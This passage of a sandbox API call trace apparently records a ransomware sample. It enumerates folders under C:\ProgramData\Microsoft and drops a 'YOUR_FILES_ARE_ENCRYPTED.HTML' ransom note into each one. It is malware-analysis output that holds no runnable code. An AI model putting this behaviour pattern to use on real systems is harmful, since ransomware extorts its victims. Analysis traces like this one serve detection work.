HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.019] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x4eb55735, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4eb55735, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0106.019] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.020] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0106.020] GetProcessHeap () returned 0x600000 [0106.020] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.021] WriteFile (in: hFile=0x304, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.022] CloseHandle (hObject=0x304) returned 1 [0106.023] GetProcessHeap () returned 0x600000 [0106.023] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.023] GetProcessHeap () returned 0x600000 [0106.023] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0106.025] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Crypto", cAlternateFileName="")) returned 1 [0106.025] StrStrIW (lpFirst="Crypto", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.025] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned 35 [0106.025] GetProcessHeap () returned 0x600000 [0106.025] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.026] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto" [0106.026] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*" [0106.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.035] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.035] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="DSS", cAlternateFileName="")) returned 1 [0106.035] StrStrIW (lpFirst="DSS", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.035] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned 39 [0106.035] GetProcessHeap () returned 0x600000 [0106.036] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0106.037] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS" [0106.037] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*" [0106.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.037] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.037] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0106.037] StrStrIW (lpFirst="MachineKeys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.037] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 51 [0106.038] GetProcessHeap () returned 0x600000 [0106.038] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0106.038] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys" [0106.038] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*" [0106.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0106.039] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0106.039] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 0 [0106.039] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0106.039] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0106.039] GetProcessHeap () returned 0x600000 [0106.039] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30e81b0 [0106.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0106.042] WriteFile (in: hFile=0x310, lpBuffer=0x30e81b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x30e81b0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.043] CloseHandle (hObject=0x310) returned 1 [0106.044] GetProcessHeap () returned 0x600000 [0106.044] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30e81b0 | out: hHeap=0x600000) returned 1 [0106.044] GetProcessHeap () returned 0x600000 [0106.044] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0106.055] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0106.055] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.056] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0106.056] GetProcessHeap () returned 0x600000 [0106.056] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.056] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.057] WriteFile (in: hFile=0x304, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.059] CloseHandle (hObject=0x304) returned 1 [0106.059] GetProcessHeap () returned 0x600000 [0106.059] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.059] GetProcessHeap () returned 0x600000 [0106.060] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0106.061] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Keys", cAlternateFileName="")) returned 1 [0106.061] StrStrIW (lpFirst="Keys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.061] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned 40 [0106.061] GetProcessHeap () returned 0x600000 [0106.061] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0106.063] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys" [0106.063] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*" [0106.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.063] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.063] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 0 [0106.063] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.063] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0106.064] GetProcessHeap () returned 0x600000 [0106.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.064] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.065] WriteFile (in: hFile=0x304, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.067] CloseHandle (hObject=0x304) returned 1 [0106.067] GetProcessHeap () returned 0x600000 [0106.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.067] GetProcessHeap () returned 0x600000 [0106.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0106.068] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="PCPKSP", cAlternateFileName="")) returned 1 [0106.068] StrStrIW (lpFirst="PCPKSP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.069] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP") returned 42 [0106.069] GetProcessHeap () returned 0x600000 [0106.069] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0106.070] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP" [0106.070] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\*" [0106.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x626878 [0106.071] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.071] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 1 [0106.071] StrStrIW (lpFirst="WindowsAIK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.071] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned 53 [0106.071] GetProcessHeap () returned 0x600000 [0106.071] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0106.072] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK" [0106.072] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*" [0106.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c336, dwReserved1=0x63c2e0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0106.073] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c336, dwReserved1=0x63c2e0, cFileName="..", cAlternateFileName="")) returned 1 [0106.073] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c336, dwReserved1=0x63c2e0, cFileName="..", cAlternateFileName="")) returned 0 [0106.073] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0106.073] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0106.073] GetProcessHeap () returned 0x600000 [0106.073] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30e81b0 [0106.073] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp\\windowsaik\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0106.075] WriteFile (in: hFile=0x310, lpBuffer=0x30e81b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x30e81b0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.076] CloseHandle (hObject=0x310) returned 1 [0106.077] GetProcessHeap () returned 0x600000 [0106.077] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30e81b0 | out: hHeap=0x600000) returned 1 